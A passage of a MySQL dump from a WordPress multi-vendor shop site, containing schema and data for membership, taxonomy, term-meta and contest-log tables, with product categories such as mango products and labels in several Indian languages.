  `event_type` varchar(255) DEFAULT NULL,
  `event_date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `member_id` varchar(16) DEFAULT '',
  `username` varchar(255) DEFAULT '',
  `ip_address` varchar(128) DEFAULT '',
  `user_agent` mediumtext DEFAULT '',
  PRIMARY KEY (`event_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_swpm_events_tbl`
--

LOCK TABLES `wp_swpm_events_tbl` WRITE;
/*!40000 ALTER TABLE `wp_swpm_events_tbl` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_swpm_events_tbl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_swpm_members_meta_tbl`
--

DROP TABLE IF EXISTS `wp_swpm_members_meta_tbl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_swpm_members_meta_tbl` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `member_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `member_id` (`member_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_swpm_members_meta_tbl`
--

LOCK TABLES `wp_swpm_members_meta_tbl` WRITE;
/*!40000 ALTER TABLE `wp_swpm_members_meta_tbl` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_swpm_members_meta_tbl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_swpm_members_tbl`
--

DROP TABLE IF EXISTS `wp_swpm_members_tbl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_swpm_members_tbl` (
  `member_id` int(12) NOT NULL AUTO_INCREMENT,
  `user_name` varchar(255) NOT NULL,
  `first_name` varchar(64) DEFAULT '',
  `last_name` varchar(64) DEFAULT '',
  `password` varchar(255) NOT NULL,
  `member_since` date NOT NULL DEFAULT '0000-00-00',
  `membership_level` smallint(6) NOT NULL,
  `more_membership_levels` varchar(100) DEFAULT NULL,
  `account_state` enum('active','inactive','activation_required','expired','pending','unsubscribed') DEFAULT 'pending',
  `last_accessed` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `last_accessed_from_ip` varchar(128) NOT NULL,
  `email` varchar(255) DEFAULT NULL,
  `phone` varchar(64) DEFAULT NULL,
  `address_street` varchar(255) DEFAULT NULL,
  `address_city` varchar(255) DEFAULT NULL,
  `address_state` varchar(255) DEFAULT NULL,
  `address_zipcode` varchar(255) DEFAULT NULL,
  `home_page` varchar(255) DEFAULT NULL,
  `country` varchar(255) DEFAULT NULL,
  `gender` enum('male','female','not specified') DEFAULT 'not specified',
  `referrer` varchar(255) DEFAULT NULL,
  `extra_info` text DEFAULT NULL,
  `reg_code` varchar(255) DEFAULT NULL,
  `subscription_starts` date DEFAULT NULL,
  `initial_membership_level` smallint(6) DEFAULT NULL,
  `txn_id` varchar(255) DEFAULT '',
  `subscr_id` varchar(255) DEFAULT '',
  `company_name` varchar(255) DEFAULT '',
  `notes` text DEFAULT NULL,
  `flags` int(11) DEFAULT 0,
  `profile_image` varchar(255) DEFAULT '',
  PRIMARY KEY (`member_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_swpm_members_tbl`
--

LOCK TABLES `wp_swpm_members_tbl` WRITE;
/*!40000 ALTER TABLE `wp_swpm_members_tbl` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_swpm_members_tbl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_swpm_membership_meta_tbl`
--

DROP TABLE IF EXISTS `wp_swpm_membership_meta_tbl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_swpm_membership_meta_tbl` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `level_id` int(11) NOT NULL,
  `meta_key` varchar(255) NOT NULL,
  `meta_label` varchar(255) DEFAULT NULL,
  `meta_value` text DEFAULT NULL,
  `meta_type` varchar(255) NOT NULL DEFAULT 'text',
  `meta_default` text DEFAULT NULL,
  `meta_context` varchar(255) NOT NULL DEFAULT 'default',
  PRIMARY KEY (`id`),
  KEY `level_id` (`level_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_swpm_membership_meta_tbl`
--

LOCK TABLES `wp_swpm_membership_meta_tbl` WRITE;
/*!40000 ALTER TABLE `wp_swpm_membership_meta_tbl` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_swpm_membership_meta_tbl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_swpm_membership_tbl`
--

DROP TABLE IF EXISTS `wp_swpm_membership_tbl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_swpm_membership_tbl` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `alias` varchar(127) NOT NULL,
  `role` varchar(255) NOT NULL DEFAULT 'subscriber',
  `permissions` tinyint(4) NOT NULL DEFAULT 0,
  `subscription_period` varchar(11) NOT NULL DEFAULT '-1',
  `subscription_duration_type` tinyint(4) NOT NULL DEFAULT 0,
  `subscription_unit` varchar(20) DEFAULT NULL,
  `loginredirect_page` text DEFAULT NULL,
  `category_list` longtext DEFAULT NULL,
  `page_list` longtext DEFAULT NULL,
  `post_list` longtext DEFAULT NULL,
  `comment_list` longtext DEFAULT NULL,
  `attachment_list` longtext DEFAULT NULL,
  `custom_post_list` longtext DEFAULT NULL,
  `disable_bookmark_list` longtext DEFAULT NULL,
  `options` longtext DEFAULT NULL,
  `protect_older_posts` tinyint(1) NOT NULL DEFAULT 0,
  `campaign_name` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_swpm_membership_tbl`
--

LOCK TABLES `wp_swpm_membership_tbl` WRITE;
/*!40000 ALTER TABLE `wp_swpm_membership_tbl` DISABLE KEYS */;
INSERT INTO `wp_swpm_membership_tbl` VALUES (1,'Content Protection','administrator',15,'0',0,NULL,NULL,'N;','a:0:{}','N;','N;','N;','N;',NULL,NULL,0,'');
/*!40000 ALTER TABLE `wp_swpm_membership_tbl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_swpm_payments_tbl`
--

DROP TABLE IF EXISTS `wp_swpm_payments_tbl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_swpm_payments_tbl` (
  `id` int(12) NOT NULL AUTO_INCREMENT,
  `email` varchar(255) DEFAULT NULL,
  `first_name` varchar(64) DEFAULT '',
  `last_name` varchar(64) DEFAULT '',
  `member_id` varchar(16) DEFAULT '',
  `membership_level` varchar(64) DEFAULT '',
  `txn_date` date NOT NULL DEFAULT '0000-00-00',
  `txn_id` varchar(255) NOT NULL DEFAULT '',
  `subscr_id` varchar(255) NOT NULL DEFAULT '',
  `reference` varchar(255) NOT NULL DEFAULT '',
  `payment_amount` varchar(32) NOT NULL DEFAULT '',
  `gateway` varchar(32) DEFAULT '',
  `status` varchar(255) DEFAULT '',
  `ip_address` varchar(128) DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_swpm_payments_tbl`
--

LOCK TABLES `wp_swpm_payments_tbl` WRITE;
/*!40000 ALTER TABLE `wp_swpm_payments_tbl` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_swpm_payments_tbl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_relationships`
--

DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_relationships`
--

LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES (1,1,0),(1,106,0),(1,107,0),(252,19,0),(256,20,0),(480,1,0),(529,30,0),(531,34,0),(532,30,0),(533,32,0),(534,34,0),(535,30,0),(536,32,0),(537,34,0),(538,18,0),(538,30,0),(539,32,0),(540,17,0),(540,34,0),(541,30,0),(542,32,0),(543,34,0),(570,42,0),(571,42,0),(572,42,0),(574,42,0),(576,16,0),(576,18,0),(576,30,0),(578,16,0),(578,17,0),(585,30,0),(586,30,0),(587,30,0),(588,30,0),(589,30,0),(590,30,0),(595,30,0),(596,30,0),(612,32,0),(626,30,0),(627,30,0),(628,30,0),(629,30,0),(630,30,0),(631,30,0),(641,73,0),(648,42,0),(685,81,0),(718,1,0),(732,1,0),(748,81,0),(778,84,0),(908,82,0),(937,86,0),(938,86,0),(939,86,0),(940,87,0),(941,87,0),(942,87,0),(943,88,0),(944,88,0),(945,88,0),(946,89,0),(947,89,0),(948,89,0),(949,90,0),(972,108,0),(973,109,0),(974,110,0),(975,111,0),(976,112,0),(977,113,0),(978,114,0),(979,115,0),(980,116,0),(981,117,0),(982,118,0),(983,119,0),(984,120,0),(985,121,0),(986,122,0),(987,123,0),(988,124,0),(989,125,0),(990,126,0),(1238,84,0),(1313,131,0),(1319,131,0),(1326,131,0),(1333,131,0),(1350,131,0),(1361,131,0),(1393,132,0),(1394,132,0),(1755,2,0),(1755,136,0),(1775,2,0),(1775,136,0),(1786,2,0),(1786,135,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_taxonomy`
--

DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=144 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_taxonomy`
--

LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,4),(2,2,'product_type','',0,3),(3,3,'product_type','',0,0),(4,4,'product_type','',0,0),(5,5,'product_type','',0,0),(6,6,'product_visibility','',0,0),(7,7,'product_visibility','',0,0),(8,8,'product_visibility','',0,0),(9,9,'product_visibility','',0,0),(10,10,'product_visibility','',0,0),(11,11,'product_visibility','',0,0),(12,12,'product_visibility','',0,0),(13,13,'product_visibility','',0,0),(14,14,'product_visibility','',0,0),(15,15,'product_cat','',0,0),(16,16,'wcmp_spmv','Used for minimum price products under all single product multi vendor concept.',0,0),(17,17,'wcmp_spmv','Used for maximum price products under all single product multi vendor concept.',0,1),(18,18,'wcmp_spmv','Used for top rated vendor products under all single product multi vendor concept.',0,1),(19,19,'category','',0,1),(20,20,'category','',0,1),(27,27,'nav_menu','',0,0),(30,30,'dc_vendor_shop','',0,7),(32,32,'dc_vendor_shop','',0,5),(34,34,'dc_vendor_shop','',0,5),(42,42,'nav_menu','',0,5),(46,46,'wcfm_knowledgebase_category','',0,0),(47,47,'wcfm_knowledgebase_category','',0,0),(48,48,'wcfm_knowledgebase_category','',0,0),(49,49,'wcfm_knowledgebase_category','',0,0),(50,50,'wcfm_knowledgebase_category','',0,0),(51,51,'wcfm_knowledgebase_category','',0,0),(52,52,'wcfm_knowledgebase_category','',0,0),(53,53,'wcfm_knowledgebase_category','',0,0),(54,54,'wcfm_knowledgebase_category','',0,0),(55,55,'wcfm_knowledgebase_category','',0,0),(56,56,'wcfm_knowledgebase_category','',0,0),(57,57,'wcfm_knowledgebase_category','',0,0),(58,58,'wcfm_knowledgebase_category','',0,0),(59,59,'wcfm_knowledgebase_category','',0,0),(60,60,'wcfm_knowledgebase_category','',0,0),(61,61,'wcfm_knowledgebase_category','',0,0),(62,62,'wcfm_knowledgebase_category','',0,0),(63,63,'wcfm_knowledgebase_category','',0,0),(64,64,'wcfm_knowledgebase_category','',0,0),(65,65,'wcfm_knowledgebase_category','',0,0),(66,66,'wcfm_knowledgebase_category','',0,0),(67,67,'wcfm_knowledgebase_category','',0,0),(68,68,'wcfm_knowledgebase_category','',0,0),(69,69,'wcfm_knowledgebase_category','',0,0),(70,70,'wcfm_knowledgebase_category','',0,0),(71,71,'wcfm_knowledgebase_category','',0,0),(72,72,'wcfm_knowledgebase_category','',0,0),(73,73,'wp_theme','',0,1),(74,74,'elementor_library_type','',0,0),(75,75,'wpfd-category','',0,0),(76,76,'product_cat','',0,0),(78,78,'product_cat','',0,0),(79,79,'product_cat','',0,0),(80,80,'product_cat','',0,0),(81,81,'nav_menu','',0,2),(82,82,'nav_menu','',0,1),(84,84,'nav_menu','',0,2),(85,85,'product_tag','',0,0),(86,86,'nav_menu','',0,3),(87,87,'nav_menu','',0,3),(88,88,'nav_menu','',0,3),(89,89,'nav_menu','',0,3),(90,90,'nav_menu','',0,1),(91,91,'language','a:3:{s:6:\"locale\";s:2:\"te\";s:3:\"rtl\";i:0;s:9:\"flag_code\";s:2:\"in\";}',0,0),(92,92,'term_language','',0,0),(93,93,'language','a:3:{s:6:\"locale\";s:5:\"ta_IN\";s:3:\"rtl\";i:0;s:9:\"flag_code\";s:2:\"in\";}',0,0),(94,94,'term_language','',0,0),(95,95,'language','a:3:{s:6:\"locale\";s:5:\"hi_IN\";s:3:\"rtl\";i:0;s:9:\"flag_code\";s:2:\"in\";}',0,0),(96,96,'term_language','',0,0),(97,97,'language','a:3:{s:6:\"locale\";s:5:\"pa_IN\";s:3:\"rtl\";i:0;s:9:\"flag_code\";s:2:\"in\";}',0,0),(98,98,'term_language','',0,0),(99,99,'language','a:3:{s:6:\"locale\";s:5:\"ml_IN\";s:3:\"rtl\";i:0;s:9:\"flag_code\";s:2:\"in\";}',0,0),(100,100,'term_language','',0,0),(101,101,'language','a:3:{s:6:\"locale\";s:2:\"kn\";s:3:\"rtl\";i:0;s:9:\"flag_code\";s:2:\"in\";}',0,0),(102,102,'term_language','',0,0),(103,103,'language','a:3:{s:6:\"locale\";s:2:\"as\";s:3:\"rtl\";i:0;s:9:\"flag_code\";s:2:\"in\";}',0,0),(104,104,'term_language','',0,0),(105,105,'language','a:3:{s:6:\"locale\";s:5:\"en_US\";s:3:\"rtl\";i:0;s:9:\"flag_code\";s:2:\"us\";}',0,0),(106,106,'term_language','',0,1),(107,107,'term_translations','a:1:{s:2:\"en\";i:1;}',0,1),(108,108,'bp-email-type','Recipient has successfully activated an account.',0,1),(109,109,'bp-email-type','A member has replied to an activity update that the recipient posted.',0,1),(110,110,'bp-email-type','A member has replied to a comment on an activity update that the recipient posted.',0,1),(111,111,'bp-email-type','Recipient was mentioned in an activity update.',0,1),(112,112,'bp-email-type','Recipient was mentioned in a group activity update.',0,1),(113,113,'bp-email-type','Recipient has registered for an account.',0,1),(114,114,'bp-email-type','A member has sent a friend request to the recipient.',0,1),(115,115,'bp-email-type','Recipient has had a friend request accepted by a member.',0,1),(116,116,'bp-email-type','A group\'s details were updated.',0,1),(117,117,'bp-email-type','A member has sent a group invitation to the recipient.',0,1),(118,118,'bp-email-type','Recipient\'s status within a group has changed.',0,1),(119,119,'bp-email-type','A member has requested permission to join a group.',0,1),(120,120,'bp-email-type','Recipient has received a private message.',0,1),(121,121,'bp-email-type','Recipient has changed their email address.',0,1),(122,122,'bp-email-type','Recipient had requested to join a group, which was accepted.',0,1),(123,123,'bp-email-type','Recipient had requested to join a group, which was rejected.',0,1),(124,124,'bp-email-type','A site member has sent a site invitation to the recipient.',0,1),(125,125,'bp-email-type','Someone has requested membership on this site.',0,1),(126,126,'bp-email-type','A site membership request has been rejected.',0,1),(127,127,'pwb-brand','',0,0),(128,128,'pwb-brand','',0,0),(129,129,'pwb-brand','',0,0),(131,131,'elementor_library_type','',0,2),(132,132,'nav_menu','',0,2),(133,133,'product_cat','',0,0),(134,134,'product_cat','',0,0),(135,135,'product_cat','',0,1),(136,136,'product_cat','',0,2),(137,137,'jb-job-type','',0,0),(138,138,'jb-job-type','',0,0),(139,139,'jb-job-type','',0,0),(140,140,'jb-job-type','',0,0),(141,141,'jb-job-type','',0,0),(142,142,'jb-job-type','',0,0),(143,143,'jb-job-type','',0,0);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_termmeta`
--

DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=152 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_termmeta`
--

LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
INSERT INTO `wp_termmeta` VALUES (39,30,'_vendor_user_id','2'),(42,32,'_vendor_user_id','3'),(45,34,'_vendor_user_id','4'),(46,15,'product_count_product_cat','0'),(82,76,'order','5'),(83,76,'display_type',''),(84,76,'thumbnail_id','0'),(85,76,'_wcfmmp_commission','a:5:{s:15:\"commission_mode\";s:6:\"global\";s:18:\"commission_percent\";s:0:\"\";s:16:\"commission_fixed\";s:0:\"\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";}'),(90,78,'order','8'),(91,78,'display_type',''),(92,78,'thumbnail_id','0'),(93,78,'_wcfmmp_commission','a:5:{s:15:\"commission_mode\";s:6:\"global\";s:18:\"commission_percent\";s:0:\"\";s:16:\"commission_fixed\";s:0:\"\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";}'),(94,79,'order','9'),(95,79,'display_type',''),(96,79,'thumbnail_id','0'),(97,79,'_wcfmmp_commission','a:5:{s:15:\"commission_mode\";s:6:\"global\";s:18:\"commission_percent\";s:0:\"\";s:16:\"commission_fixed\";s:0:\"\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";}'),(98,80,'order','10'),(99,80,'display_type',''),(100,80,'thumbnail_id','0'),(101,80,'_wcfmmp_commission','a:5:{s:15:\"commission_mode\";s:6:\"global\";s:18:\"commission_percent\";s:0:\"\";s:16:\"commission_fixed\";s:0:\"\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";}'),(102,76,'product_count_product_cat','0'),(104,78,'product_count_product_cat','0'),(105,79,'product_count_product_cat','0'),(106,80,'product_count_product_cat','0'),(107,15,'order','1'),(115,85,'product_count_product_tag','0'),(121,133,'order','0'),(122,133,'display_type',''),(123,133,'thumbnail_id','0'),(124,133,'_wcfmmp_commission','a:5:{s:15:\"commission_mode\";s:6:\"global\";s:18:\"commission_percent\";s:0:\"\";s:16:\"commission_fixed\";s:0:\"\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";}'),(125,134,'order','0'),(126,134,'display_type',''),(127,134,'thumbnail_id','0'),(128,134,'_wcfmmp_commission','a:5:{s:15:\"commission_mode\";s:6:\"global\";s:18:\"commission_percent\";s:0:\"\";s:16:\"commission_fixed\";s:0:\"\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";}'),(129,135,'order','0'),(130,135,'display_type',''),(131,135,'thumbnail_id','0'),(132,135,'_wcfmmp_commission','a:5:{s:15:\"commission_mode\";s:6:\"global\";s:18:\"commission_percent\";s:0:\"\";s:16:\"commission_fixed\";s:0:\"\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";}'),(133,133,'product_count_product_cat','0'),(134,134,'product_count_product_cat','0'),(135,135,'product_count_product_cat','1'),(136,136,'order','0'),(137,136,'product_count_product_cat','2'),(138,137,'jb-color','#0e6245'),(139,137,'jb-background','#cbf4c9'),(140,138,'jb-color','#3d4eac'),(141,138,'jb-background','#d6ecff'),(142,139,'jb-color','#a3052a'),(143,139,'jb-background','#fedce4'),(144,140,'jb-color','#983705'),(145,140,'jb-background','#f8e5b9'),(146,141,'jb-color','#5c3eb7'),(147,141,'jb-background','#e0d4ff'),(148,142,'jb-color','#8c2a84'),(149,142,'jb-background','#ffd7fc'),(150,143,'jb-color','#4f566b'),(151,143,'jb-background','#e3e8ee');
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_terms`
--

DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=144 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_terms`
--

LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'simple','simple',0),(3,'grouped','grouped',0),(4,'variable','variable',0),(5,'external','external',0),(6,'exclude-from-search','exclude-from-search',0),(7,'exclude-from-catalog','exclude-from-catalog',0),(8,'featured','featured',0),(9,'outofstock','outofstock',0),(10,'rated-1','rated-1',0),(11,'rated-2','rated-2',0),(12,'rated-3','rated-3',0),(13,'rated-4','rated-4',0),(14,'rated-5','rated-5',0),(15,'Uncategorized','uncategorized',0),(16,'Min Price','min-price',0),(17,'Max Price','max-price',0),(18,'Top rated vendor','top-rated-vendor',0),(19,'food','food',0),(20,'offer','offer',0),(27,'Main','main',0),(30,'Alpha','alpha',0),(32,'Beta','beta',0),(34,'Gamma','gamma',0),(42,'Help','help',0),(46,'General','general',0),(47,'Product','product',0),(48,'Order','order',0),(49,'Coupon','coupon',0),(50,'Article','article',0),(51,'Shipping','shipping',0),(52,'Settings','settings',0),(53,'Membership','membership',0),(54,'Profile','profile',0),(55,'Payment','payment',0),(56,'Withdrawal','withdrawal',0),(57,'Refund','refund',0),(58,'Review','review',0),(59,'Policy','policy',0),(60,'Inquiry','inquiry',0),(61,'Support Ticket','support-ticket',0),(62,'Invoice','invoice',0),(63,'Vacation','vacation',0),(64,'Verification','verification',0),(65,'Report','report',0),(66,'Customer','customer',0),(67,'Followers','followers',0),(68,'Announcement','announcement',0),(69,'Notification','notification',0),(70,'Analytics','analytics',0),(71,'Marketing','marketing',0),(72,'SEO','seo',0),(73,'open-shop','open-shop',0),(74,'page','page',0),(75,'New category','new-category',1),(76,'Mango Concentrate','mango-concentrate',0),(78,'Mango Puree','mango-puree',0),(79,'Mango Squash','mango-squash',0),(80,'Dried Mango','dried-mango',0),(81,'link','link',0),(82,'contest','contest',0),(84,'Pre order','pre-order',0),(85,'Pre Order','pre-order',0),(86,'Mobile App - Hamburger menu','mobile-app-hamburger-menu',0),(87,'Mobile App - Sections menu','mobile-app-sections-menu',0),(88,'Mobile App - Push Notifications Categories','mobile-app-push-notifications-categories',0),(89,'Mobile App - Categories','mobile-app-categories',0),(90,'Mobile App - Settings menu','mobile-app-settings-menu',0),(91,'తెలుగు','te',0),(92,'తెలుగు','pll_te',0),(93,'தமிழ்','ta',0),(94,'தமிழ்','pll_ta',0),(95,'हिन्दी','hi',0),(96,'हिन्दी','pll_hi',0),(97,'ਪੰਜਾਬੀ','pa',0),(98,'ਪੰਜਾਬੀ','pll_pa',0),(99,'മലയാളം','ml',0),(100,'മലയാളം','pll_ml',0),(101,'ಕನ್ನಡ','kn',0),(102,'ಕನ್ನಡ','pll_kn',0),(103,'অসমীয়া','as',0),(104,'অসমীয়া','pll_as',0),(105,'English','en',0),(106,'English','pll_en',0),(107,'pll_6209f36b0d986','pll_6209f36b0d986',0),(108,'core-user-activation','core-user-activation',0),(109,'activity-comment','activity-comment',0),(110,'activity-comment-author','activity-comment-author',0),(111,'activity-at-message','activity-at-message',0),(112,'groups-at-message','groups-at-message',0),(113,'core-user-registration','core-user-registration',0),(114,'friends-request','friends-request',0),(115,'friends-request-accepted','friends-request-accepted',0),(116,'groups-details-updated','groups-details-updated',0),(117,'groups-invitation','groups-invitation',0),(118,'groups-member-promoted','groups-member-promoted',0),(119,'groups-membership-request','groups-membership-request',0),(120,'messages-unread','messages-unread',0),(121,'settings-verify-email-change','settings-verify-email-change',0),(122,'groups-membership-request-accepted','groups-membership-request-accepted',0),(123,'groups-membership-request-rejected','groups-membership-request-rejected',0),(124,'bp-members-invitation','bp-members-invitation',0),(125,'members-membership-request','members-membership-request',0),(126,'members-membership-request-rejected','members-membership-request-rejected',0),(127,'Kanakapura','kanakapura',0),(128,'Ramanagara','ramanagara',0),(129,'Srinivasapura','srinivasapura',0),(131,'landing-page','landing-page',0),(132,'landing page main menu','landing-page-main-menu',0),(133,'Beauty &amp; Skin care products','beauty-skin-care-products',0),(134,'Pooja needs','pooja-needs',0),(135,'Organic fertilizer &amp; repellent','organic-fertilizer-repellent',0),(136,'donation','donation',0),(137,'Full-time','full-time',0),(138,'Part-time','part-time',0),(139,'Internship','internship',0),(140,'Freelance','freelance',0),(141,'Temporary','temporary',0),(142,'Graduate','graduate',0),(143,'Volunteer','volunteer',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_totalcontest_log`
--

DROP TABLE IF EXISTS `wp_totalcontest_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_totalcontest_log` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ip` varchar(45) DEFAULT NULL,
  `useragent` varchar(512) DEFAULT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `contest_id` bigint(20) unsigned NOT NULL,
  `submission_id` bigint(20) unsigned NOT NULL,
  `action` varchar(100) NOT NULL,
  `status` varchar(20) NOT NULL,
  `details` longtext DEFAULT NULL,
  `date` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`id`),
  KEY `IP` (`ip`),
  KEY `USER_ID` (`user_id`),
  KEY `CONTEST_ID` (`contest_id`),
  KEY `SUBMISSION_ID` (`submission_id`),
  KEY `ACTION` (`action`),
  KEY `STATUS` (`status`),
  KEY `DATE` (`date`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_totalcontest_log`
--

LOCK TABLES `wp_totalcontest_log` WRITE;
/*!40000 ALTER TABLE `wp_totalcontest_log` DISABLE KEYS */;
